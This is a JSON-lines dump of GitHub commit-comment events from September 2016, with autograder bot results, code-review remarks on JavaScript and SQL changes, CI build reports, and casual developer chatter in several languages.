{"id":"4581376250","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073791,"position":null,"line":null,"path":null,"commit_id":"2048127309864abe0aee1ce0133a17a0c33965ae","created_at":"2016-09-19T04:50:35Z","updated_at":"2016-09-19T04:50:35Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-19T04:50:35Z"}
{"id":"4581376395","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073792,"position":null,"line":null,"path":null,"commit_id":"2048127309864abe0aee1ce0133a17a0c33965ae","created_at":"2016-09-19T04:50:40Z","updated_at":"2016-09-19T04:50:40Z","body":"Failed to execute tests."}},"created_at":"2016-09-19T04:50:40Z"}
{"id":"4581377181","type":"CommitCommentEvent","actor":{"login":"mksarge"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":19073794,"position":null,"line":null,"path":null,"commit_id":"b98348955586eb3713e96730b331c09d72d8ad4c","created_at":"2016-09-19T04:51:08Z","updated_at":"2016-09-19T04:51:08Z","body":"@rtholmes, is this sufficient for what you requested in #10?\r\n\r\nI didn't know how to write the functions using promises, so I used the callback style I've been using throughout the rest of my code. ie. return callback with 1st arg = error (null if no error, else string), and 2nd arg = data (null if error, else return value)\r\n\r\nThe code looks quite ugly beside all your promise-returning functions, so if you want to rewrite it, please feel free to. Any questions?\r\n\r\n"}},"created_at":"2016-09-19T04:51:08Z"}
{"id":"4581380247","type":"CommitCommentEvent","actor":{"login":"acivinesod"},"repo":{"name":"acivinesod/hello-world"},"payload":{"comment":{"id":19073799,"position":null,"line":null,"path":null,"commit_id":"428ba745e396b90de9c9cb3b9e7662efa3c17ada","created_at":"2016-09-19T04:52:58Z","updated_at":"2016-09-19T04:52:58Z","body":"1 KOMENTAR ZA DRUGA_GRANA"}},"created_at":"2016-09-19T04:52:58Z"}
{"id":"4581380447","type":"CommitCommentEvent","actor":{"login":"camerondehart"},"repo":{"name":"codebayarea/codebayarea.github.io"},"payload":{"comment":{"id":19073800,"position":null,"line":null,"path":null,"commit_id":"9f8dc99a5ddbbdee520381d08321c911f9c48f9c","created_at":"2016-09-19T04:53:04Z","updated_at":"2016-09-19T04:53:04Z","body":"Thanks for catching that!"}},"created_at":"2016-09-19T04:53:04Z"}
{"id":"4581380570","type":"CommitCommentEvent","actor":{"login":"tsmilan"},"repo":{"name":"a5c3nd3d/SWE20001-Battleships"},"payload":{"comment":{"id":19073802,"position":null,"line":null,"path":null,"commit_id":"31b275e915e5fa99aeabfae70e13f5b97fbb57ab","created_at":"2016-09-19T04:53:09Z","updated_at":"2016-09-19T04:53:09Z","body":"Fixes #7 "}},"created_at":"2016-09-19T04:53:09Z"}
{"id":"4581381790","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19073805,"position":null,"line":null,"path":null,"commit_id":"f1dc56067c3f4f59429006e48db5e9aed414b318","created_at":"2016-09-19T04:53:53Z","updated_at":"2016-09-19T04:53:53Z","body":"Hi, \r\nmaybe something like this? \r\n```\r\nsetup.maxCount = function(spawn){\r\n    if (spawn.room.situation.invasion || spawn.room.conserveForDefense || spawn.room.containerController.length == 0 ) \r\n        return 0;\r\n    return spawn.room.storage ? 1 + Math.floor(spawn.room.storage.store.energy / MAX_STORAGE_ENERGY) : 1;\r\n};\r\n```"}},"created_at":"2016-09-19T04:53:53Z"}
{"id":"4581382532","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073810,"position":null,"line":null,"path":null,"commit_id":"2048127309864abe0aee1ce0133a17a0c33965ae","created_at":"2016-09-19T04:54:20Z","updated_at":"2016-09-19T04:54:20Z","body":"@CPSC310Bot "}},"created_at":"2016-09-19T04:54:20Z"}
{"id":"4581382569","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073811,"position":null,"line":null,"path":null,"commit_id":"2048127309864abe0aee1ce0133a17a0c33965ae","created_at":"2016-09-19T04:54:21Z","updated_at":"2016-09-19T04:54:21Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-19T04:54:21Z"}
{"id":"4581382661","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073812,"position":null,"line":null,"path":null,"commit_id":"2048127309864abe0aee1ce0133a17a0c33965ae","created_at":"2016-09-19T04:54:25Z","updated_at":"2016-09-19T04:54:25Z","body":"Failed to execute tests."}},"created_at":"2016-09-19T04:54:25Z"}
{"id":"4581382820","type":"CommitCommentEvent","actor":{"login":"klepas"},"repo":{"name":"AusDTO/gov-au-ui-kit"},"payload":{"comment":{"id":19073813,"position":5,"line":18,"path":"examples/partials/header.hbs","commit_id":"924aee20f66858beaac985765d26d47a9a4b09a2","created_at":"2016-09-19T04:54:30Z","updated_at":"2016-09-19T04:54:30Z","body":"@petronbot Hey, switching this over to the kss.css — aren’t we using this partial also for the current gov.au example pages? This means they’re served the KSS CSS, no?"}},"created_at":"2016-09-19T04:54:30Z"}
{"id":"4581383043","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073814,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-19T04:54:39Z","updated_at":"2016-09-19T04:54:39Z","body":"@CPSC310Bot "}},"created_at":"2016-09-19T04:54:39Z"}
{"id":"4581383064","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073815,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-19T04:54:39Z","updated_at":"2016-09-19T04:54:39Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-19T04:54:39Z"}
{"id":"4581383238","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073816,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-19T04:54:46Z","updated_at":"2016-09-19T04:54:46Z","body":"3 passing, 5 failing (37.5%)\nName of first spec to fail: Should be able to find CPSC courses over 70 not by gail or by gregor \n\t[ POST http://localhost:4321/query ]"}},"created_at":"2016-09-19T04:54:46Z"}
{"id":"4581384170","type":"CommitCommentEvent","actor":{"login":"kr00125"},"repo":{"name":"JaVashit/opensourceSW1"},"payload":{"comment":{"id":19073817,"position":1,"line":1,"path":"hong","commit_id":"2fff05c4c715064bd644d39e6f8865946300f43c","created_at":"2016-09-19T04:55:18Z","updated_at":"2016-09-19T04:55:18Z","body":"I wanna go and some coffee."}},"created_at":"2016-09-19T04:55:18Z"}
{"id":"4581384708","type":"CommitCommentEvent","actor":{"login":"diddyman"},"repo":{"name":"Devbootcamp/phase-0-tracks"},"payload":{"comment":{"id":19073819,"position":null,"line":null,"path":null,"commit_id":"e2a66f59ec257286c9d7b30c7fdbc2fcdd95503c","created_at":"2016-09-19T04:55:39Z","updated_at":"2016-09-19T04:55:39Z","body":"@mechamanny"}},"created_at":"2016-09-19T04:55:39Z"}
{"id":"4581387116","type":"CommitCommentEvent","actor":{"login":"JaVashit"},"repo":{"name":"JaVashit/opensourceSW1"},"payload":{"comment":{"id":19073820,"position":1,"line":1,"path":"hong","commit_id":"2fff05c4c715064bd644d39e6f8865946300f43c","created_at":"2016-09-19T04:57:08Z","updated_at":"2016-09-19T04:57:08Z","body":"so...? Would you like some coffee?"}},"created_at":"2016-09-19T04:57:08Z"}
{"id":"4581392414","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073831,"position":90,"line":90,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T05:00:08Z","updated_at":"2016-09-19T05:00:08Z","body":"**刚开始**是用$.each()遍历对象，数组的，后来有需求需要改变对象的每一项的内容，看以前项目中的代码发现$.map可以改变对象的值并返回改变过的对象或数组。刚开始也是这么用的。\r\n**但是后来用HIGH了**，又加上自己其实没有对这两种方法做过区分，我就在心里面认为他们是一样的作用了，开始随便用了。因为用的时候我发现$.map(v,k);$.each(k,v)有区别，所以有点时候我用不到k，就直接用$.map来做循环了。\r\n\r\n**这次我去看了一下API：**\r\n>$.map将一个数组中的所有元素转换到另一个数组中。\r\n>$.each 一个通用的迭代函数，它可以用来无缝迭代对象和数组。数组和类似数组的对象通过一个长度属性（如一个函数的参数对象）来迭代数字索引，从0到length - 1。其他对象通过其属性名进行迭代。\r\n\r\n这次以后我就记住了，不会乱用这两个API了。"}},"created_at":"2016-09-19T05:00:08Z"}
{"id":"4581395545","type":"CommitCommentEvent","actor":{"login":"Dave-Lim"},"repo":{"name":"JaVashit/opensourceSW1"},"payload":{"comment":{"id":19073835,"position":1,"line":1,"path":"hong","commit_id":"2fff05c4c715064bd644d39e6f8865946300f43c","created_at":"2016-09-19T05:01:46Z","updated_at":"2016-09-19T05:01:46Z","body":"Oh, Coffee!\r\nGood! Good!\r\nTeam master will buy some coffee!"}},"created_at":"2016-09-19T05:01:46Z"}
{"id":"4581396198","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073836,"position":null,"line":null,"path":null,"commit_id":"25f056ca24db7958f218337b373d61a81189367c","created_at":"2016-09-19T05:02:10Z","updated_at":"2016-09-19T05:02:10Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-19T05:02:10Z"}
{"id":"4581396594","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073837,"position":null,"line":null,"path":null,"commit_id":"25f056ca24db7958f218337b373d61a81189367c","created_at":"2016-09-19T05:02:22Z","updated_at":"2016-09-19T05:02:22Z","body":"3 passing, 5 failing (37.5%)\nName of first spec to fail: Should be able to find CPSC courses over 70 not by gail or by gregor"}},"created_at":"2016-09-19T05:02:22Z"}
{"id":"4581399677","type":"CommitCommentEvent","actor":{"login":"Dave-Lim"},"repo":{"name":"JaVashit/opensourceSW1"},"payload":{"comment":{"id":19073839,"position":1,"line":1,"path":"hong","commit_id":"2fff05c4c715064bd644d39e6f8865946300f43c","created_at":"2016-09-19T05:03:32Z","updated_at":"2016-09-19T05:03:32Z","body":"Sleeping is coming....."}},"created_at":"2016-09-19T05:03:32Z"}
{"id":"4581400696","type":"CommitCommentEvent","actor":{"login":"Dave-Lim"},"repo":{"name":"JaVashit/opensourceSW1"},"payload":{"comment":{"id":19073841,"position":1,"line":1,"path":"hong","commit_id":"2fff05c4c715064bd644d39e6f8865946300f43c","created_at":"2016-09-19T05:04:09Z","updated_at":"2016-09-19T05:04:09Z","body":"他山之石"}},"created_at":"2016-09-19T05:04:09Z"}
{"id":"4581401353","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073844,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-19T05:04:33Z","updated_at":"2016-09-19T05:04:33Z","body":"@CPSC310Bot "}},"created_at":"2016-09-19T05:04:33Z"}
{"id":"4581401377","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073845,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-19T05:04:34Z","updated_at":"2016-09-19T05:04:34Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-19T05:04:34Z"}
{"id":"4581401570","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"mecctro/rehash"},"payload":{"comment":{"id":19073846,"position":4,"line":1566,"path":"sql/mysql/slashschema_create.sql","commit_id":"d9960c791eb5e661aa1bf8389d3bf2cc46e26381","created_at":"2016-09-19T05:04:40Z","updated_at":"2016-09-19T05:04:40Z","body":"This should probably be in : rehash/plugins/Moderation/mysql_schema.sql\r\nHowever, seeing there is a check in : Slash/Utility/Comments/Comments.pm\r\n`_is_mod_banned`\r\n\r\nI suspect this check may break if this field is not defaulted, further input would be appreciated."}},"created_at":"2016-09-19T05:04:40Z"}
{"id":"4581401608","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073847,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-19T05:04:41Z","updated_at":"2016-09-19T05:04:41Z","body":"3 passing, 5 failing (37.5%)\nName of first spec to fail: Should be able to find CPSC courses over 70 not by gail or by gregor"}},"created_at":"2016-09-19T05:04:41Z"}
{"id":"4581404084","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073851,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-19T05:06:06Z","updated_at":"2016-09-19T05:06:06Z","body":"@CPSC310Bot "}},"created_at":"2016-09-19T05:06:06Z"}
{"id":"4581404111","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073852,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-19T05:06:07Z","updated_at":"2016-09-19T05:06:07Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-19T05:06:07Z"}
{"id":"4581404337","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073855,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-19T05:06:14Z","updated_at":"2016-09-19T05:06:14Z","body":"3 passing, 5 failing (37.5%)\nName of first spec to fail: Should be able to find CPSC courses over 70 not by gail or by gregor"}},"created_at":"2016-09-19T05:06:14Z"}
{"id":"4581405622","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":19073857,"position":null,"line":null,"path":null,"commit_id":"b98348955586eb3713e96730b331c09d72d8ad4c","created_at":"2016-09-19T05:06:57Z","updated_at":"2016-09-19T05:06:57Z","body":"That's awesome, thanks so much! I promisified it (while still having the async stuff on the inside). I'll test it in the lab tomorrow am."}},"created_at":"2016-09-19T05:06:57Z"}
{"id":"4581407210","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"mate-desktop/mate-common"},"payload":{"comment":{"id":19073860,"position":null,"line":null,"path":null,"commit_id":"0cbb9c88dc747d8521be9e452b21b15bfdd98196","created_at":"2016-09-19T05:07:52Z","updated_at":"2016-09-19T05:07:52Z","body":"It took longer than I thought, I hope to handle the remaining projects today."}},"created_at":"2016-09-19T05:07:52Z"}
{"id":"4581407700","type":"CommitCommentEvent","actor":{"login":"acivinesod"},"repo":{"name":"acivinesod/hello-world"},"payload":{"comment":{"id":19073863,"position":null,"line":null,"path":null,"commit_id":"8a10a8c717691c7f40d5b0a45db3165c99327919","created_at":"2016-09-19T05:08:11Z","updated_at":"2016-09-19T05:08:11Z","body":"KOnačno je došla nova verzija\r\n"}},"created_at":"2016-09-19T05:08:11Z"}
{"id":"4581408007","type":"CommitCommentEvent","actor":{"login":"acivinesod"},"repo":{"name":"acivinesod/hello-world"},"payload":{"comment":{"id":19073864,"position":null,"line":null,"path":null,"commit_id":"8a10a8c717691c7f40d5b0a45db3165c99327919","created_at":"2016-09-19T05:08:19Z","updated_at":"2016-09-19T05:08:19Z","body":"Šta je tu novo"}},"created_at":"2016-09-19T05:08:19Z"}
{"id":"4581408283","type":"CommitCommentEvent","actor":{"login":"acivinesod"},"repo":{"name":"acivinesod/hello-world"},"payload":{"comment":{"id":19073865,"position":null,"line":null,"path":null,"commit_id":"8a10a8c717691c7f40d5b0a45db3165c99327919","created_at":"2016-09-19T05:08:28Z","updated_at":"2016-09-19T05:08:28Z","body":"OEE dio !!!"}},"created_at":"2016-09-19T05:08:28Z"}
{"id":"4581408562","type":"CommitCommentEvent","actor":{"login":"acivinesod"},"repo":{"name":"acivinesod/hello-world"},"payload":{"comment":{"id":19073866,"position":null,"line":null,"path":null,"commit_id":"8a10a8c717691c7f40d5b0a45db3165c99327919","created_at":"2016-09-19T05:08:39Z","updated_at":"2016-09-19T05:08:39Z","body":"A ha, da - super.\r\n"}},"created_at":"2016-09-19T05:08:39Z"}
{"id":"4581410828","type":"CommitCommentEvent","actor":{"login":"rs10693"},"repo":{"name":"hackiftekhar/IQKeyboardManager"},"payload":{"comment":{"id":19073869,"position":null,"line":null,"path":null,"commit_id":"440807dfcb2403d66bd48ffbe0bdccaba04e95f9","created_at":"2016-09-19T05:09:56Z","updated_at":"2016-09-19T05:09:56Z","body":"please check once on swift-3"}},"created_at":"2016-09-19T05:09:56Z"}
{"id":"4581412467","type":"CommitCommentEvent","actor":{"login":"ucasFL"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":19073872,"position":null,"line":null,"path":null,"commit_id":"c171d07f3b187b3bd445fb16c635c505c3c7b7b0","created_at":"2016-09-19T05:10:51Z","updated_at":"2016-09-19T05:10:51Z","body":"\n\n\n�� 2016-09-19 11:27:52��\"Xingyu.Wang\" <notifications@github.com> ������\n\n>PUB:20160828  4 Best Linux Boot Loaders\n>\n>@ucasFL ����������������������������������������������\n>����������������\n>-- \n>You are receiving this because you were mentioned.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/LCTT/TranslateProject/commit/c171d07f3b187b3bd445fb16c635c505c3c7b7b0\n\n\n\n\n"}},"created_at":"2016-09-19T05:10:51Z"}
{"id":"4581413939","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19073876,"position":null,"line":null,"path":null,"commit_id":"20d838693d6a71197a08495add3993f4ec39ce53","created_at":"2016-09-19T05:11:37Z","updated_at":"2016-09-19T05:11:37Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2365 of 2370 tests passed, 0 test warnings)\n\n * 5 tests had: EIO diffs.\n * 4 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 5 tests had: Table big diffs.\n * 4 tests had: AUD diffs.\n * 4 tests had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 2 tests had: MTD diffs.\n * 1 test had: RDD diffs.\n * 3 tests had: MTR big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.79%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T05:11:37Z"}
{"id":"4581415196","type":"CommitCommentEvent","actor":{"login":"pearlsravanthi"},"repo":{"name":"strandls/biodiv"},"payload":{"comment":{"id":19073877,"position":4,"line":60,"path":"grails-app/controllers/species/SpeciesController.groovy","commit_id":"0b61f55f068e9c2548e9b117e791a4185f10f31c","created_at":"2016-09-19T05:12:17Z","updated_at":"2016-09-19T05:12:17Z","body":"Can you include this in AbstractObjectController so that all modules can use it"}},"created_at":"2016-09-19T05:12:17Z"}
{"id":"4581416352","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19073880,"position":null,"line":null,"path":null,"commit_id":"21936384b5d896aae4459e6859cbb8a1701dcd5f","created_at":"2016-09-19T05:12:56Z","updated_at":"2016-09-19T05:12:56Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/21936384b5d896aae4459e6859cbb8a1701dcd5f#commitcomment-19073575) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/ea89031caf748aa4450320e520c8127478b43a7b/daily_2016_9_19/report.md). cc @jrevels"}},"created_at":"2016-09-19T05:12:56Z"}
{"id":"4581418931","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073890,"position":122,"line":122,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T05:14:18Z","updated_at":"2016-09-19T05:14:18Z","body":"改成这样了\r\n```\r\nfn.initSpot = function (orderList) {\r\n    var _this = this;\r\n    return $.map(orderList, function (orderInfo) {\r\n        //返回绑定了地图时间的marker覆盖物\r\n       return _this.bindCoverEvent( _this.drawMarker( orderInfo ) );\r\n    });\r\n};\r\n```"}},"created_at":"2016-09-19T05:14:18Z"}
{"id":"4581420141","type":"CommitCommentEvent","actor":{"login":"wooferzfg"},"repo":{"name":"TehGelly/LiveSplit"},"payload":{"comment":{"id":19073892,"position":12,"line":1828,"path":"LiveSplit.AutoSplitters.xml","commit_id":"c275aa24419debfd7acb7eefe98a5c3502517c5c","created_at":"2016-09-19T05:14:58Z","updated_at":"2016-09-19T05:14:58Z","body":"Could you change this to \"Load Removal, Auto Splitting, and Auto Reset are available.\""}},"created_at":"2016-09-19T05:14:58Z"}
{"id":"4581420969","type":"CommitCommentEvent","actor":{"login":"bilalonal"},"repo":{"name":"bilalonal/JavaTrainings"},"payload":{"comment":{"id":19073893,"position":null,"line":null,"path":null,"commit_id":"61e6201bb931913479aa5a72773af5674a853e26","created_at":"2016-09-19T05:15:26Z","updated_at":"2016-09-19T05:15:26Z","body":"a"}},"created_at":"2016-09-19T05:15:26Z"}
{"id":"4581421083","type":"CommitCommentEvent","actor":{"login":"bilalonal"},"repo":{"name":"bilalonal/JavaTrainings"},"payload":{"comment":{"id":19073895,"position":null,"line":null,"path":null,"commit_id":"61e6201bb931913479aa5a72773af5674a853e26","created_at":"2016-09-19T05:15:30Z","updated_at":"2016-09-19T05:15:30Z","body":"sasdasd"}},"created_at":"2016-09-19T05:15:30Z"}
{"id":"4581421370","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19073896,"position":null,"line":null,"path":null,"commit_id":"20d838693d6a71197a08495add3993f4ec39ce53","created_at":"2016-09-19T05:15:40Z","updated_at":"2016-09-19T05:15:40Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T05:15:40Z"}
{"id":"4581421556","type":"CommitCommentEvent","actor":{"login":"proactive-solutions"},"repo":{"name":"proactive-solutions/AutoCompleteTextField"},"payload":{"comment":{"id":19073897,"position":13,"line":72,"path":"AutoCompleteTextField/AutoCompleteTextField.swift","commit_id":"78ab014864545e7441feffc22d52e76c7c10ccc1","created_at":"2016-09-19T05:15:48Z","updated_at":"2016-09-19T05:15:48Z","body":"Show the result which start with the search string."}},"created_at":"2016-09-19T05:15:48Z"}
{"id":"4581421588","type":"CommitCommentEvent","actor":{"login":"proactive-solutions"},"repo":{"name":"proactive-solutions/AutoCompleteTextField"},"payload":{"comment":{"id":19073898,"position":4,"line":48,"path":"AutoCompleteTextField/AutoCompleteTextField.swift","commit_id":"78ab014864545e7441feffc22d52e76c7c10ccc1","created_at":"2016-09-19T05:15:50Z","updated_at":"2016-09-19T05:15:50Z","body":"Hide unnecessary rows from the list."}},"created_at":"2016-09-19T05:15:50Z"}
{"id":"4581422093","type":"CommitCommentEvent","actor":{"login":"parthshah"},"repo":{"name":"appirio-tech/connect-app"},"payload":{"comment":{"id":19073899,"position":null,"line":null,"path":null,"commit_id":"8a16cf45813f350610e676519c15881d08665a7e","created_at":"2016-09-19T05:16:05Z","updated_at":"2016-09-19T05:16:05Z","body":"@vikasrohit consider adding a projectId to the root of the feed state so your can co-relate feed data to the correct project. When switching b/w projects you will need to differentiate which project the loaded feed belongs to."}},"created_at":"2016-09-19T05:16:05Z"}
{"id":"4581422580","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19073900,"position":null,"line":null,"path":null,"commit_id":"5e631b1aa92812b784fbf479768b3f027e187300","created_at":"2016-09-19T05:16:21Z","updated_at":"2016-09-19T05:16:21Z","body":"I kept it for one reason... on first boot my 1gb ram laptop displays\n1GB personal storage and about 700MB free. With the new approach it\nsays about 750MB personal storage and about 480MB free... i thought\nthat might not be right.. i don't know that much, it might seem that i\nhave great understanding of linux and all, but most of what i do just\nhappens like a miracle. One day i was complaining about how complex\ngtkdialog it and expressing how i hate it, the next day i was heavily\nediting puppyapps. Overall i'm still a newbie that only knows how to\nuse puppy and how it used to work.\n\nSo i'll take your opinion into consideration and will come to a\nresolution soon..\n"}},"created_at":"2016-09-19T05:16:21Z"}
{"id":"4581428633","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073906,"position":171,"line":171,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T05:19:42Z","updated_at":"2016-09-19T05:19:42Z","body":"1、`_this.planMap.map`这个应该缓存起来；\r\n2、后端以这种格式`{000：{value:kkk,id:000}}`传给我，我只能通过循环获取。\r\n但是我做的不好的地方是，应该和后端约定好的。约定好就不会传给我这种格式，我也不会把他写到循环里。"}},"created_at":"2016-09-19T05:19:42Z"}
{"id":"4581432052","type":"CommitCommentEvent","actor":{"login":"Hitagi77"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19073913,"position":null,"line":null,"path":null,"commit_id":"4c2ac36b72d49a793d973ddda7662fe6fc267760","created_at":"2016-09-19T05:21:32Z","updated_at":"2016-09-19T05:21:32Z","body":"หมายความว่าตอนนี่เลิกอัพเดตแล้วหรอครับ \r\n"}},"created_at":"2016-09-19T05:21:32Z"}
{"id":"4581437184","type":"CommitCommentEvent","actor":{"login":"Camo-Master"},"repo":{"name":"Camo-Master/Screeps2322"},"payload":{"comment":{"id":19073919,"position":null,"line":null,"path":null,"commit_id":"849ee73aa87c2e47ec32fd5b2eb035cf9010c1dd","created_at":"2016-09-19T05:24:20Z","updated_at":"2016-09-19T05:24:20Z","body":"general update"}},"created_at":"2016-09-19T05:24:20Z"}
{"id":"4581437436","type":"CommitCommentEvent","actor":{"login":"saritakh"},"repo":{"name":"hirenvadalia/pbspro"},"payload":{"comment":{"id":19073920,"position":452,"line":11677,"path":"test/fw/ptl/lib/pbs_testlib.py","commit_id":"dbe342f056c469515352b7eef0668240629ea99c","created_at":"2016-09-19T05:24:27Z","updated_at":"2016-09-19T05:24:27Z","body":"Condition should be \"if ret != 0\""}},"created_at":"2016-09-19T05:24:27Z"}
{"id":"4581437656","type":"CommitCommentEvent","actor":{"login":"Sandertv"},"repo":{"name":"BoxOfDevs/BoxOfBits"},"payload":{"comment":{"id":19073922,"position":null,"line":null,"path":null,"commit_id":"1014a4af2550215892a9045cb3c9ede077f780f6","created_at":"2016-09-19T05:24:35Z","updated_at":"2016-09-19T05:24:35Z","body":"Okay shared it with dropbox."}},"created_at":"2016-09-19T05:24:35Z"}
{"id":"4581439476","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073926,"position":267,"line":267,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T05:25:33Z","updated_at":"2016-09-19T05:25:33Z","body":"恩恩，\r\n1、感觉更明确，开阔了我的思路，get了新技能，^_^\r\n2、名字确实不明确，吐槽一下，我起名快起吐了。。。。"}},"created_at":"2016-09-19T05:25:33Z"}
{"id":"4581440416","type":"CommitCommentEvent","actor":{"login":"xinxin63"},"repo":{"name":"deruncie/SparseFactorMixedModel"},"payload":{"comment":{"id":19073928,"position":null,"line":null,"path":null,"commit_id":"0bdacad95abc698b6766ecb9e42a8c2102135cec","created_at":"2016-09-19T05:26:01Z","updated_at":"2016-09-19T05:26:01Z","body":"#2 "}},"created_at":"2016-09-19T05:26:01Z"}
